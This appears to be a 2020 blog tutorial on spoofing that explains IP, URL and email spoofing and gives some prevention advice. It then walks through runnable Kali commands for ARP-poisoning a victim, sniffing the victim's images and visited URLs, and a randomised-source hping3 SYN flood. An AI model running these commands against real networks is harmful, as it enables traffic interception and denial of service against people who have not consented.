Spoofing
By Abul Faeze Mohammad Bakabillah (Russell) post at Feb 09, 2020
By Abul Faeze Mohammad Bakabillah (Russell) post at Feb 09, 2020
Spoofing, in general, is a fraudulent or malicious practice in which communication is sent from an unknown source disguised as a source known to the receiver. Spoofing is most prevalent in communication mechanisms that lack a high level of security. In short Spoofing is "The False Digital Identity “.
Internet Protocol (IP) is the protocol used for transmitting messages over the Internet; it is a network protocol operating at layer 3 of the OSI model. IP spoofing is the act of manipulated the headers in a transmitted message to mask a hackers true identity so that the message could appear as though it is from a trusted source.
In a Man-in-the-Middle attack, the message sent to a recipient is intercepted by a third-party which manipulates the packets and resends it own message.
A DoS attack is when a attacker floods a system with more packets than its resources can handle. This then causes the system to overload and shut down. The source address is spoofed making it difficult to track from where the attacks are taking place.
IP spoofing can be prevented by monitoring packets using network monitoring software. A filtering router could also be installed, on the router an ACL (access control list) is needed to block private addresses on your downstream interface. On the upstream interface source address originating outside of the IP valid range will be blocked from sending spoofed information.
URL spoofing occurs when one website appears as if it is another. The URL that is displayed is not the real URL of the site, therefore the information is sent to a hidden web address.
URL spoofing is sometimes used to direct a user to a fraudulent site and by giving the site the same look and feel as the original site the user attempts to login with a username and password. The hacker collects the username and password then displays a password error and directs the user to the legitimate site. Using this technique the hacker could create a series of fake websites and steal a user's private information unknowingly.
Security patches are released by web browsers which add the feature of revealing the "true" URL of a site in the web browser. It is important to check if your internet browser is vulnerable and to perform the necessary updates.
Email spoofing is the act of altering the header of an email so that the email appears to be sent from someone else
This is the simple scenario, and I try to draw it in a picture.
# echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof –i eth0 –t 192.168.1.90 192.168.1.1
#arpspoof –I eth0 –t 192.168.1.1 192.168.1.90
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
# driftnet – i eth0
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
# urlsnarf -i eth0
and urlsnarf will start capturing all website address visited by victim machine.
root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.80
So how do you know it’s working? In hping3 flood mode, we don’t check replies received (actually you can’t because in this command we’ve used –rand-source flag which means the source IP address is not yours anymore.
Took me just 5 minutes to completely make this machine unresponsive (that’s the definition of DoS – Denial of Service).
In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really slow.